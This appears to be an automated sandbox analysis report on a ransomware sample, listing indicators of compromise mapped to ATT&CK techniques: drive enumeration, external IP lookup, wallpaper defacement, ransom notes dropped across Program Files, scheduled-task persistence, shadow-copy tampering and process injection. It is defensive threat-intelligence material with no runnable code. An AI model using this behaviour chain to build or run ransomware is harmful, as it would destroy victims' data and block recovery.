File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\QDAZQ7UR\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\S3IV548V\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\NK9YD4KU\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\K819CMRP\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

8Pk9qSFt64.exe941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File opened (read-only)	\??\Z:	8Pk9qSFt64.exe
File opened (read-only)	\??\Z:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\V:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\Q:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\H:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\B:	8Pk9qSFt64.exe
File opened (read-only)	\??\U:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\O:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\K:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\K:	8Pk9qSFt64.exe
File opened (read-only)	\??\X:	8Pk9qSFt64.exe
File opened (read-only)	\??\S:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\F:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\G:	8Pk9qSFt64.exe
File opened (read-only)	\??\J:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\G:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\A:	8Pk9qSFt64.exe
File opened (read-only)	\??\E:	8Pk9qSFt64.exe
File opened (read-only)	\??\J:	8Pk9qSFt64.exe
File opened (read-only)	\??\P:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\M:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\L:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\W:	8Pk9qSFt64.exe
File opened (read-only)	\??\Y:	8Pk9qSFt64.exe
File opened (read-only)	\??\E:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\M:	8Pk9qSFt64.exe
File opened (read-only)	\??\Q:	8Pk9qSFt64.exe
File opened (read-only)	\??\T:	8Pk9qSFt64.exe
File opened (read-only)	\??\U:	8Pk9qSFt64.exe
File opened (read-only)	\??\Y:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\X:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\W:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\R:	8Pk9qSFt64.exe
File opened (read-only)	\??\S:	8Pk9qSFt64.exe
File opened (read-only)	\??\N:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\H:	8Pk9qSFt64.exe
File opened (read-only)	\??\V:	8Pk9qSFt64.exe
File opened (read-only)	\??\T:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\F:	8Pk9qSFt64.exe
File opened (read-only)	\??\P:	8Pk9qSFt64.exe
File opened (read-only)	\??\N:	8Pk9qSFt64.exe
File opened (read-only)	\??\O:	8Pk9qSFt64.exe
File opened (read-only)	\??\R:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	8Pk9qSFt64.exe
File opened (read-only)	\??\L:	8Pk9qSFt64.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 myexternalip.com

flow	ioc
8	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\H5mnJKOJ.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jmc.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\cs.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\ja-JP\bckgRes.dll.mui	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\README.txt	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Nome	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Mahjong\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\messages_es.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\flavormap.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\README.html	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Chihuahua	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

520 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

384 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe8Pk9qSFt64.exe

pid process

1948 powershell.exe
1524 8Pk9qSFt64.exe
1524 8Pk9qSFt64.exe
1524 8Pk9qSFt64.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

8Pk9qSFt64.exe

pid process

1524 8Pk9qSFt64.exe

pid	process
520	schtasks.exe

pid	process
384	vssadmin.exe

pid	process
1948	powershell.exe
1524	8Pk9qSFt64.exe
1524	8Pk9qSFt64.exe
1524	8Pk9qSFt64.exe

pid	process
1524	8Pk9qSFt64.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exe8Pk9qSFt64.exetakeown.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	1524	8Pk9qSFt64.exe
Token: SeLoadDriverPrivilege	1524	8Pk9qSFt64.exe
Token: SeTakeOwnershipPrivilege	108	takeown.exe
Token: SeTakeOwnershipPrivilege	1676	takeown.exe
Token: SeTakeOwnershipPrivilege	1072	takeown.exe
Token: SeTakeOwnershipPrivilege	1276	takeown.exe
Token: SeBackupPrivilege	1736	vssvc.exe
Token: SeRestorePrivilege	1736	vssvc.exe
Token: SeAuditPrivilege	1736	vssvc.exe
Token: SeTakeOwnershipPrivilege	268	takeown.exe
Token: SeTakeOwnershipPrivilege	1756	takeown.exe
Token: SeTakeOwnershipPrivilege	1616	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.execmd.execmd.execmd.execmd.execmd.exe8Pk9qSFt.exe

description	pid	process	target process
PID 1580 wrote to memory of 1920	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1920	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1920	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1920	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 760	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWbpVd9W.exe
PID 1580 wrote to memory of 760	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWbpVd9W.exe
PID 1580 wrote to memory of 760	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWbpVd9W.exe
PID 1580 wrote to memory of 760	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWbpVd9W.exe
PID 1580 wrote to memory of 1632	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1632	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1632	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1632	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1632 wrote to memory of 1948	1632	cmd.exe	powershell.exe
PID 1632 wrote to memory of 1948	1632	cmd.exe	powershell.exe
PID 1632 wrote to memory of 1948	1632	cmd.exe	powershell.exe
PID 1632 wrote to memory of 1948	1632	cmd.exe	powershell.exe
PID 1580 wrote to memory of 1452	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1452	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1452	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1452	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1072	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1072	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1072	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1072	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1452 wrote to memory of 292	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 292	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 292	1452	cmd.exe	reg.exe
PID 1452 wrote to memory of 292	1452	cmd.exe	reg.exe
PID 1072 wrote to memory of 1880	1072	cmd.exe	wscript.exe
PID 1072 wrote to memory of 1880	1072	cmd.exe	wscript.exe
PID 1072 wrote to memory of 1880	1072	cmd.exe	wscript.exe
PID 1072 wrote to memory of 1880	1072	cmd.exe	wscript.exe
PID 1580 wrote to memory of 1836	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 1580 wrote to memory of 1836	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
